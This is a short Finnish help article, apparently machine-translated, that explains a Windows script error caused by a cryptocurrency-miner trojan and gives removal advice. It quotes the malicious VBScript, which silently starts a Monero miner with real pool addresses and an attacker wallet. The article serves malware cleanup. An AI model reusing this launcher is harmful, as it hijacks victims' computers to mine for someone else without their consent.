Jos saat seuraavan virheviestin, joka liittyy ”xdgaudio.vbs” järjestelmään, tietokoneesi on todennäköisesti saastunut.
Komentosarja: C: \ windows \ xdgaudio.vbsRivi: 3
Char: 1
Virhe: Järjestelmä ei löydä määritettyä tiedostoa.
Koodi: 80070002
Lähde: (nolla)
Kun skriptiä muokataan Notepadilla, se voi sisältää seuraavia rivejä:
Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -px", 0 Set WShell = Nothing
Tämä varmasti näyttää CPU / cryptocurrency Miner-troijalaiselta, joka ei vain hidasta tietokoneesi toimintaa, vaan voi myös aiheuttaa turvallisuusuhkan. Skriptitiedostot c: \ Windows \ xdgaudio.vbs ja c: \ Windows \ servicecrsssr.vbs olisi poistettava. Tuo ei riitä. Suorita perusteellinen tarkistus käyttämällä Malwarebytes-haittaohjelmia ja skannaa myös käyttämäsi virustorjuntaohjelman kanssa.
Katso yksityiskohtaiset ohjeet tällaisen Miner Trojan -sovelluksen poistamisesta malwaretips.com -oppaasta Kuinka poistaa CPU Miner Trojan -laite Windowsista (Viruksen ohjeopas) .